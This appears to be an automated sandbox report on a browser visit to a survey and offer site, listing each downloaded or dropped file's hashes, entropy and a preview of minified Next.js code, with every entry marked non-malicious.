                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[37520],{37520:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_13.99d105c0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAACwAQCdASoIAAgAAkA4JQBOgB6Q9drgAP7vr7dqpes024OvrHuIR7QkI0kbrX4ZKeuadKE7rxe5YpwArZ1HGNLPdKU2HzjKud73+JWL5gAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x512, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9632
                                                                                                          Entropy (8bit):7.981338184160406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:gha5cp0cnyTiM9/tMSXrD34piyoLLrb6OicveVFAjQe+lZqam9:g059H3hX4piyoLLS3soFTw
                                                                                                          MD5:1192AD10E8C7C76923773BF1D9DE5F78
                                                                                                          SHA1:0BD37667717BB00E99726109EF610D2D549538FA
                                                                                                          SHA-256:F08C35A00B1A0D74F9344C6216EE0C89DA1FB3B4A016168DB7D064195CB56ABB
                                                                                                          SHA-512:70A13D4F50D5820687AE1D533A71573DFAE8A5DE569EF476A24BFA49BA1662A86E27E7691B7E4ED394FF24392014D9AB60F798B6F51FFF16FFB020F1DD131E1F
                                                                                                          Malicious:false
                                                                                                          Preview:RIFF.%..WEBPVP8 .%.......*....>m6.G.?.!)..K...gn..8...3O..0.a..D.....{k..$.o...?...w......o...M..Ao..@=}.......................0.+..|....c}..... 2................|[.....y...1>.?.....P...:.:....3....%...}0..jD..vk...H.W.....x. ........F.........B4..d...R...Y.?.?9.El........A.F.Y.`.=.v......E.k.7..6&g3...m.R7......A~,Pz..R.,.B..].Z.ajiD.[..L..^l/.K......(...W.4..I.bNT'P...iC..++kpH..bJb....U.....!.6...P......@...=.......0, ..w....;..;&. .q......?c.8.[.....509Z...,....v.Z....cUK6.......pP.E..m'.k.......~.V.{.n.!8.7..`).......P.!%.VGG..H...' ..\"4...k]......y..b..&/.gfU....*^a......E.NzH..N..N..>#G-.e.cQ@Ng.n.........QEL..bo.%......r........]I.[V./..~.R.!.........=..7....q..F.3r.....q..?...5....!.2...cc...#.....V..S#..T..}..},..T.W.p......0.......w...d........{......o...tU*`....V.&...rQ..<...+k...`..G`..:C.h.:R.:&..z.....K..(...../xmv...........U.i..<k...%..%....N.U!.0.[..;x...~...u........Ci4_c>..l.0]....zv..8U.........Hi...jt.~!0..c`....U....`...V.J./6.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (28786), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28786
                                                                                                          Entropy (8bit):5.070274798655066
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:EdBhGXSyDCReCBG0WT/7c+VKzHABMgxxwfwsyAHINb6gCnRw2E3Wzl:E7fgCnRw2Ei
                                                                                                          MD5:CCAEC829469360A11C663AB570BC8C31
                                                                                                          SHA1:4F4C6617E5AEFF41540E05E3574D31C1554E4F42
                                                                                                          SHA-256:964299685C7EC0EF90A70B7A2BE12E479140C62F70E47D32FB713E6DEA37532D
                                                                                                          SHA-512:ABF727C700E9EF5B2435029E56E3B875831E1CA17802C33545946E9BC6F1E8A210E108710C76CE5F1AE7F4FC0E5E845403F153C678EE8EE80690BADE4CEE6E45
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[74764],{74764:function(n,i,o){o.r(i);var e=o(47842),t=o(70865),r=o(66383),u=o(56753),l=o(25237),d=o.n(l),v=o(12139),s=o(54983),a=o(29754),c=o(46889),f=o(42251),m=o(4569),h=d()((function(){return o.e(1051).then(o.bind(o,1051))}),{loadableGenerated:{webpack:function(){return[1051]}},ssr:!1});i.default=function(n){var i,o,l,d,p,g,q=n.step,w=n.setStep,x=n.questions,C=n.imgUrl,b=n.isShowProgressBar,Z=n.isShowProgressNumbers,B=n.isProgressNumbersInsideBar,y=n.onLastStepAnswered,z=n.onLastStepLoad,k=n.progressBarQuestion,S=n.getQuestionsContainerStyle,M=n.onLoad,I=n.onStepChange,j=n.wasExternalClick,P=n.changeWasExternalClick,E=n.progressBarLength,Q=n.answerElement,W=n.onUpdate,D=n.isFullPageAnswersClick,H=(0,r.Z)((0,c.u)("surveyStep",null!==(g=null===(i=x[0])||void 0===i?void 0:i.id)&&void 0!==g?g:"","session"),2),T=H[0],A=H[1],L=(0,r.Z)((0,c.u)("startQTime",Date.now(),"session"),2),N=L[0],R=L[1],X=(0,r.Z)((0,c.u)("answers
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7033), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):7033
                                                                                                          Entropy (8bit):5.435337343313622
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xjpI6Vkux5lqZ5XKCGklxWKwcKcZpyRv/vt57EYQcG:xlIfunlqZhKCG88Kwc7byRntNErcG
                                                                                                          MD5:0423E9F04482FB5515F7847EAD11974C
                                                                                                          SHA1:0C68534F158D022AA558877A2822591CCAD45A05
                                                                                                          SHA-256:5AEE159618A68108C36F251495310DDD1380C4C9055C727B8B723C297A113F67
                                                                                                          SHA-512:B5D872F70130AB40C74F4034F96A4912D05643B31CFE0056F65594969FB5C4FB378EB57DEAC55ECBC11C2DD33C7494D2FABECB956EFCC743FBAD9E716425C1C1
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47081],{47081:function(e,r,a){a.r(r),a.d(r,{default:function(){return A}});var s,t=a(70865),n=a(96670),c=a(12139),i=a(54983),o=a(60838),u=a(47747),l=a(71961),d=a(25869),f=a(53444),p=a(19495),k=a(95798),_=a(98788),b=a(42838),v=a(22970),h=a(17969),y=a(97897),m=a(77261),D=a(34406),R=a(66383),P=function(e){var r=e.searchParams,a=e.params,s=!0,t=!1,n=void 0;try{for(var c,i=Object.entries(a)[Symbol.iterator]();!(s=(c=i.next()).done);s=!0){var o=(0,R.Z)(c.value,2),u=o[0],l=o[1];void 0!==l&&null!==l&&r.set(u,l)}}catch(d){t=!0,n=d}finally{try{s||null==i.return||i.return()}finally{if(t)throw n}}return r};!function(e){e.ZEYDOO="ZEYDOO",e.OFFER_PANEL="OFFER_PANEL",e.APPLAB_ZEYDOO="APPLAB_ZEYDOO"}(s||(s={}));var O=function(e){var r=e.oaid,a=e.osVersion,t=e.isAnalyticsEnable,n=e.aliasId,i=e.isApplabRedirectless,u=e.isRedirectless,d=e.isOfferPanel,p=(0,c.useState)(null),k=p[0],R=p[1],O=(0,c.useState)(null),A=O[0],I=O[1],E=(0,c.useS
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (28572), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28572
                                                                                                          Entropy (8bit):4.7795370276807025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:IkQfB1XxhiFHhPzFIujugBMqAYE2wq51D3TYaL/J:Ir3XghpIuiUMqA32wqX38q/J
                                                                                                          MD5:291ACFE4EA8A8E770C0CA7A2445736D5
                                                                                                          SHA1:4C2FB043F8917EB0CF7F522475B69E78A92BC625
                                                                                                          SHA-256:46C9D3BB2FD380C416046D5E9B57567FE15EB3B71A5A8C586F0E3D3716F8379A
                                                                                                          SHA-512:909A0EFFDC9BE501D66B1085534AF80782CF84E8641C99900AE095557C5BC2BB39D95C0BD140FC9CB84E3494CFA6729339B4F5A9299F89DE5995C672089173EA
                                                                                                          Malicious:false
                                                                                                          Preview:!function(){"use strict";var e={},a={};function f(d){var c=a[d];if(void 0!==c)return c.exports;var b=a[d]={exports:{}},t=!0;try{e[d].call(b.exports,b,b.exports,f),t=!1}finally{t&&delete a[d]}return b.exports}f.m=e,function(){var e=[];f.O=function(a,d,c,b){if(!d){var t=1/0;for(i=0;i<e.length;i++){d=e[i][0],c=e[i][1],b=e[i][2];for(var n=!0,r=0;r<d.length;r++)(!1&b||t>=b)&&Object.keys(f.O).every((function(e){return f.O[e](d[r])}))?d.splice(r--,1):(n=!1,b<t&&(t=b));if(n){e.splice(i--,1);var o=c();void 0!==o&&(a=o)}}return a}b=b||0;for(var i=e.length;i>0&&e[i-1][2]>b;i--)e[i]=e[i-1];e[i]=[d,c,b]}}(),f.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return f.d(a,{a:a}),a},f.d=function(e,a){for(var d in a)f.o(a,d)&&!f.o(e,d)&&Object.defineProperty(e,d,{enumerable:!0,get:a[d]})},f.f={},f.e=function(e){return Promise.all(Object.keys(f.f).reduce((function(a,d){return f.f[d](e,a),a}),[]))},f.u=function(e){return 79529===e?"static/chunks/0c51ac0c16ed4101-17360
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):376
                                                                                                          Entropy (8bit):5.824086313105618
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrkWSE8eD9lLjqBZNoiJxHHNa0WuCZJoex/A0AWGdiQLf:+dbjfd8ehlL0ZCCG0WNPx/qfdiQT
                                                                                                          MD5:E47E2C1B0ED07006AD6BB2D5CC86D21C
                                                                                                          SHA1:A1D8CCF85AFA2A41380C304A33FC840C43CC5E5A
                                                                                                          SHA-256:58CB9607DA95E5377FB5DB591D3D9EADCA75215FEED075186BF3F2D36D4294AB
                                                                                                          SHA-512:B1330E0B293C2E503E8F16ADAF844C8CA80ED657958DC1EEB7013627504732359E6728185C639CC920A96BCDBF37AC5D4E857219E1A376FC2CC3313A01EFCCC8
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73718],{73718:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_48.584c4353.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlQAAABXRUJQVlA4IEgAAADQAQCdASoIAAgAAkA4JZACdAD0TAItgAD3f4Ua4jloJZ0lCqRVzVBC2HFTu+PI87e+6p557bsT6eXOMFS8Dl+lVX6K8tuAAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (16942), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):16942
                                                                                                          Entropy (8bit):5.474064307451758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:NE/w5AqxPiwD35OHonGslLfysFzovu2ZZ4w:NH7iwdr1wA4N
                                                                                                          MD5:B4AB4E31311E377B75A64ECCCEC27618
                                                                                                          SHA1:182F93517E719F5BC2072B2B512AB0CB621E34FF
                                                                                                          SHA-256:1F28DC7DD04793E5A3E89ECAE2989E8F4028B21C742771B4749CECBB44C1D6F7
                                                                                                          SHA-512:5190C38C42269040C12A576BBEB5B1D2472BE0CD5BB4ABAB7E78CB72FBD3FACD97CF513F4EF11109AEFB69E07B530DCACDCD48877793755CD4B73AC63207EEDA
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8203,69674,42251,50297],{48045:function(n,e,t){"use strict";t.d(e,{h:function(){return a}});var r=t(12139),i=t(29754);function a(n){var e=(0,r.useState)(void 0),t=e[0],a=e[1],o=(0,r.useState)(!1),c=o[0],s=o[1];return(0,r.useEffect)((function(){if(!c){var e=new URLSearchParams(window.location.search).get("designId"),t=[];if(e)if(e.startsWith("[")&&e.endsWith("]")){t=JSON.parse(e).map((function(n){return Number(n)})).filter((function(n){return!Number.isNaN(n)}))}else{var r=Number(e);Number.isNaN(r)||(t=[r])}else void 0!==n&&(t=Array.isArray(n)?n:[n]);var o=i.H.get("design"),u=o?Number.parseInt(o,10):void 0,d=t.includes(u);if(u&&d){var l=t.indexOf(u);u=t[(l+1)%t.length],i.H.set("design",u.toString()),s(!0)}else{if(0===t.length&&u)return i.H.clear("design"),void a(void 0);void 0!==(u=t[0])&&i.H.set("design",u.toString()),s(!0)}a(u)}}),[c]),(0,r.useEffect)((function(){s(!1)}),[]),t}},73470:function(n,e,t){"use strict";t.d(e,{Y:functio
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.82287529661584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrX2eD9lLjHCTTmuNoiJxHHNa8tNsAs+MZrtz8nwtd3HLWGIdiQLf:+dbjX2ehlLD8CCG8tFMttwEWVdiQT
                                                                                                          MD5:59CAEA6E1EDC6EDDFA247EBA648299D6
                                                                                                          SHA1:83F621C424229AF5F7FA879E955CD3717F16CB2F
                                                                                                          SHA-256:74A35FB066E72B0571D2DD046D91F3E74B735D18313E4A018233AE90FC4064D9
                                                                                                          SHA-512:9D6AD3A1FAF2ECCD53224D58BDEEC157A397737CD144A7E35A52F66E97015E59FAFA33475E64D76D8C29EED56F3966D58565C15441426B68B89FE9FEA5F801FD
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[21182],{21182:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_27.34e63576.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAACwAQCdASoIAAgAAkA4JQBOgCHXWSwAAMlSEqVecXa2MqnHGzlfaEcnMp9o4+GLY+uyW7EtQUW4PI7N+3gdtUkgiyRnnQ3fwAAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6307), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):6307
                                                                                                          Entropy (8bit):5.366726448460751
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:nJsRnsIpHRXiQSljUcOKakHv5ITuRI/hvu1LNZbojnMf:JsRpRXipwE1RD
                                                                                                          MD5:7760D1AA9B70AA37FBCC5479F8E7EB98
                                                                                                          SHA1:B3460CB757B6982730473630AC637DA98A38B5F3
                                                                                                          SHA-256:BD2D63C5AFDEC719E0D8E35458A0F36C4615D5D3164B4FA2C943D29CFB64EB2D
                                                                                                          SHA-512:D9BD3D1F555EB7E59E81DE83F6CB1153561C8C94FAA470BE1766B39655597047787A28DBE0F2023C3A5912E8848407D7FE2A052DF61583C25942CD8FFCA30AFA
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[17220],{75552:function(n,t,r){r.d(t,{i:function(){return o}});var o="-apple-system, Roboto, Helvetica, sans-serif"},66236:function(n,t,r){var o;r.d(t,{O:function(){return o}}),function(n){n.LIGHT="light",n.DARK="dark",n.DARK_CLOSE_ICON="dark_close_icon",n.BLUE="blue"}(o||(o={}))},84277:function(n,t,r){var o;r.d(t,{V:function(){return o}}),function(n){n.LEFT_BOTTOM="left_bottom",n.RIGHT_BOTTOM="right_bottom",n.FULL_WIDTH_BOTTOM="full_width_bottom"}(o||(o={}))},17220:function(n,t,r){r.r(t),r.d(t,{COOKIE_URLS:function(){return H},default:function(){return K}});var o=r(56753),i=r(12139),e=r(66236),u=r(84277),c=r(29754),f=r(92228),a=r(93888),d=r(75552);function l(){var n=(0,f.Z)(["\n right: 0;\n "]);return l=function(){return n},n}function s(){var n=(0,f.Z)(["\n left: 0;\n "]);return s=function(){return n},n}function p(){var n=(0,f.Z)(["\n left: 0;\n right: 0;\n "]);return p=function(){return
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (378), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):378
                                                                                                          Entropy (8bit):5.824406219527274
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzricQaEeD9lLjHMAHsNoiJxHHNaCHZRkClkkCgWFkKvtofLOildiQLf:+dbjicFEehlLDMAMCCG/gqjt2hldiQT
                                                                                                          MD5:59CA1E955E8D6AD1E54609519D4509A2
                                                                                                          SHA1:3B394B7452235BF18C34C8053C56C655690F9E90
                                                                                                          SHA-256:3C9985CEFCB43A24A8DE56B63F84648E05584F84949EFF68AC8E7095B52422AE
                                                                                                          SHA-512:D1E2587581F457180B59BCCD43B61A792727CECD7FBA279F8FD530A8C602E31C4E7E7BBCBA8B3D902CE3E8596332031E2A9C78C467A6C5874D8B489FB5215C2D
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1955],{1955:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_28.094ddc20.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCdASoIAAgAAkA4JYgCdLoAArqxC4yEAP7SmFoQ+Yr4o3U7s1YzAg9R2DcqxswQnizmYyi1Yuq0/W5MoHp15TgZN5FIsroUAAAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.8420098745266005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrmpeD9lLjQuNoiJxHHNaCH1s9Pk8KA6KqTgZikrCW8FCldiQLf:+dbjmpehlL0uCCGP6Kqq8sldiQT
                                                                                                          MD5:DEC9097A6FCAEBFF476CB5B57CF6016B
                                                                                                          SHA1:0FC195915F4419714CBD13F1B9DC1D57A8CBFF28
                                                                                                          SHA-256:E354F9B752FBC6662C6C2AE2F2EE980CC70ABD4CC0324FF4E17BF557CC38C5CF
                                                                                                          SHA-512:FD3F12AE73294A97D0C0A4D0FF4DD677BEC2EB6BB181C68F1C8A81EC1A70B00736E7CBBA8968B03D1E4C703AFC5C40AEC14E3F98AB04F84DDE7B6D1FDDDA2014
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58376],{58376:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_23.1ea7d609.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAACwAQCdASoIAAgAAkA4JQBOgB6Q/0uAAP7tLtxKFAW7b/qnrMpf/4mis4fxIygpB4Zaxq5YPVcXFMhsQE7+Hdzdetbr/LOnXWEYsgAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (30035), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30035
                                                                                                          Entropy (8bit):5.3939013260573505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:bUMojjcKsVnjBHuJaSYhPL2DZRFtPW25HZlcR8SxY9opL5a2OIvfA5GgAy0t5:YMQjfsfHfz2DxpuhUY5ZfAExBt5
                                                                                                          MD5:0E650C6FBDBAEA01C64C59F71ECBE089
                                                                                                          SHA1:75D3AEF97713ED867EB35E87CB91D4A6AD74AC3B
                                                                                                          SHA-256:08800A958EF86E09D5001801F2F8645AE0A14002A8610F38A883B747E73CB544
                                                                                                          SHA-512:063AED16C4678DEB360E29827DB992EB3862CB3DAF0F83BB7CC4D6C7A34EDC0DEF3DE98E94F9EE8063124BDABBA872BEA4336D53BB94039B22C013762BADA64F
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81658],{88665:function(e){e.exports=function(e,t,r,n){var o=r?r.call(n,e,t):void 0;if(void 0!==o)return!!o;if(e===t)return!0;if("object"!==typeof e||!e||"object"!==typeof t||!t)return!1;var s=Object.keys(e),a=Object.keys(t);if(s.length!==a.length)return!1;for(var i=Object.prototype.hasOwnProperty.bind(t),c=0;c<s.length;c++){var u=s[c];if(!i(u))return!1;var l=e[u],f=t[u];if(!1===(o=r?r.call(n,l,f,u):void 0)||void 0===o&&l!==f)return!1}return!0}},93888:function(e,t,r){"use strict";r.d(t,{f6:function(){return Mt},vJ:function(){return Vt},iv:function(){return Ht},ZP:function(){return Jt},F4:function(){return Kt},zo:function(){return Jt}});var n=function(){return n=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},n.apply(this,arguments)};Object.create;function o(e,t,r){if(r||2===arguments.length)for(var n,o=0,s=t.length;o<s;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.857155687155353
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrqcAiTebeD9lLjUwPuNoiJxHHNaCHZRsU5WEzfj8LbhJ9ldiQLf:+dbjqcAHbehlL4GuCCGc/Ibz9ldiQT
                                                                                                          MD5:03B02FA3434BB49AAB7CE7ACD2FFE7AD
                                                                                                          SHA1:E293B8C55DE4D50C71A84D47F6EA7D1C6C6BB6D9
                                                                                                          SHA-256:59C74603A6DAFD22E1BC494CE75612F60550617251B6C880FE6EC3964CA2EED4
                                                                                                          SHA-512:2EA597EF9C308F366D0955DAFC21D47CADE3D066793FD07BABDCEBBAF31E8BBE6F1E4B291CFA05864F47DAF0A635287B94DF68FFEB46D6FD17B9EE27C9A7A613
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[99600],{99600:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_24.a0b04b39.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCdASoIAAgAAkA4JQBOgMVL7Mnic2OgAOJ0k+TkggES2qW+TBPwWjNoQTV8mUodM7SvxOkARirM66MMRbzVOZcUEpHUoEd8AAAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (16942), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16942
                                                                                                          Entropy (8bit):5.474064307451758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:NE/w5AqxPiwD35OHonGslLfysFzovu2ZZ4w:NH7iwdr1wA4N
                                                                                                          MD5:B4AB4E31311E377B75A64ECCCEC27618
                                                                                                          SHA1:182F93517E719F5BC2072B2B512AB0CB621E34FF
                                                                                                          SHA-256:1F28DC7DD04793E5A3E89ECAE2989E8F4028B21C742771B4749CECBB44C1D6F7
                                                                                                          SHA-512:5190C38C42269040C12A576BBEB5B1D2472BE0CD5BB4ABAB7E78CB72FBD3FACD97CF513F4EF11109AEFB69E07B530DCACDCD48877793755CD4B73AC63207EEDA
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8203,69674,42251,50297],{48045:function(n,e,t){"use strict";t.d(e,{h:function(){return a}});var r=t(12139),i=t(29754);function a(n){var e=(0,r.useState)(void 0),t=e[0],a=e[1],o=(0,r.useState)(!1),c=o[0],s=o[1];return(0,r.useEffect)((function(){if(!c){var e=new URLSearchParams(window.location.search).get("designId"),t=[];if(e)if(e.startsWith("[")&&e.endsWith("]")){t=JSON.parse(e).map((function(n){return Number(n)})).filter((function(n){return!Number.isNaN(n)}))}else{var r=Number(e);Number.isNaN(r)||(t=[r])}else void 0!==n&&(t=Array.isArray(n)?n:[n]);var o=i.H.get("design"),u=o?Number.parseInt(o,10):void 0,d=t.includes(u);if(u&&d){var l=t.indexOf(u);u=t[(l+1)%t.length],i.H.set("design",u.toString()),s(!0)}else{if(0===t.length&&u)return i.H.clear("design"),void a(void 0);void 0!==(u=t[0])&&i.H.set("design",u.toString()),s(!0)}a(u)}}),[c]),(0,r.useEffect)((function(){s(!1)}),[]),t}},73470:function(n,e,t){"use strict";t.d(e,{Y:functio
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (564), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):564
                                                                                                          Entropy (8bit):5.265637059621039
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:+dbjqQaT7FZovvKOR06x/MRX+Rfd1MYMLImH9M4yb6Y1dTJn:ibjGT7GvKOCYIXGfEVHWd6IdT9
                                                                                                          MD5:C45318362185A0B90E2DEBF5AF50CEE8
                                                                                                          SHA1:C9D8D22169DFC142151A18117F9E8FB148D78DF7
                                                                                                          SHA-256:AD1EFCDCD1133EDD03BE157D2B3C174238D8B4C6DCF347C5677CCB4E2C49DD5A
                                                                                                          SHA-512:E87C9F4FC3CD6928FE7205C34687846A6176EA04BE0F690234B20A293D7C2143E4BAEFCBDE11FC7F169442D1402E763DC03C0524CEFEEB70CE68E9E07220B45C
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95491],{95491:function(n,e,r){r.r(e);var t=r(92228),c=r(93888);function o(){var n=(0,t.Z)(["\n place-self: center;\n height: 40px;\n width: 100%;\n max-width: 300px;\n border-radius: 5px;\n display: flex;\n align-items: center;\n justify-content: center;\n color: #212529;\n background: #ffc107;\n border: 1px solid #ffb306;\n &:hover {\n color: #212529;\n background: #e0a800;\n border-color: #d39e00;\n }\n"]);return o=function(){return n},n}e.default=(0,c.iv)(o())}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15840)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16490
                                                                                                          Entropy (8bit):5.583853820103505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WDC77FbFjbRN8h+eYFCatOJ39BEisNWP7gDhlPQ5EKQIkT8:d771Ff8h+eYFC/JNYa71
                                                                                                          MD5:80D7433DBC2B7708F2FA4E6A9943A116
                                                                                                          SHA1:350C6E2BB1CBD07DE260856F918F4ECECCD96894
                                                                                                          SHA-256:54862EBDCFA23C67D6DE25543E0B22014DE8FD8D3D3AED09D615981BBDD76251
                                                                                                          SHA-512:6C065D9D4D04B7C4A11AE28751A711A064410055E1DB34DAED1C74D98F0257A304481BBF2AF96B0845075F43D43BAFEAB34A49241A2A63F967FC0867748F6052
                                                                                                          Malicious:false
                                                                                                          Preview:!function(){window.__ds3dcv__.mmh=function(f,$){for(var x,_=f.length,e=$^_,d=0;_>=4;)x=(65535&(x=255&f.charCodeAt(d)|(255&f.charCodeAt(++d))<<8|(255&f.charCodeAt(++d))<<16|(255&f.charCodeAt(++d))<<24))*1540483477+(((x>>>16)*1540483477&65535)<<16),x^=x>>>24,e=(65535&e)*1540483477+(((e>>>16)*1540483477&65535)<<16)^(x=(65535&x)*1540483477+(((x>>>16)*1540483477&65535)<<16)),_-=4,++d;switch(_){case 3:e^=(255&f.charCodeAt(d+2))<<16;case 2:e^=(255&f.charCodeAt(d+1))<<8;case 1:e^=255&f.charCodeAt(d),e=(65535&e)*1540483477+(((e>>>16)*1540483477&65535)<<16)}return e^=e>>>13,e=(65535&e)*1540483477+(((e>>>16)*1540483477&65535)<<16),(e^=e>>>15)>>>0};}();.Object.entries||(Object.entries=function(e){for(var r=Object.keys(e),t=r.length,n=new Array(t);t--;)n[t]=[r[t],e[r[t]]];return n});(function(E,T,K,Y){!function(){var n,e,t=K[E.N]&&K[E.N][E.K]&&K[E.N][E.K][E.T]&&E.d==typeof T[K[E.N][E.K][E.T]]?T[K[E.N][E.K][E.T]]:E.u,i=E.g(),o=function(n,e=!E.Y){if((n=n[E.C](E.ST(E.Ig,E.Lg),E.l))in i)return i[n];var
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):65
                                                                                                          Entropy (8bit):4.929759351356858
                                                                                                          Encrypted:false
